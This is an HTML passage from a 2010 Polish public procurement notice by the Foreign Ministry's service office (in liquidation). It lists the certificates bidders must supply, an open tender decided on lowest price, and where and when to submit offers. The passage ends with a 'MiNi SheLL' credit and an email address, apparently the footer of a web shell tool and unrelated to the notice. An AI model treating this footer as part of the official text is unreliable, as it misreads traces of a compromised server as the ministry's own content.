<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Oświadczenie o spełnianiu warunków z art. 22 ust.1 pkt.1 ustawy  Prawo zamówień publicznych.
b)Oświadczenie o spełnianiu warunków z art. 22 ust.1 pkt. 2-4 ustawy  Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl, zakładka Aktualności, zakładka Zamówienia Publiczne Zarząd Obsługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi MSZ
                                                                                   w likwidacji
     00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2010 godzina 10:00, miejsce: Dziennik Podawczy
     00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com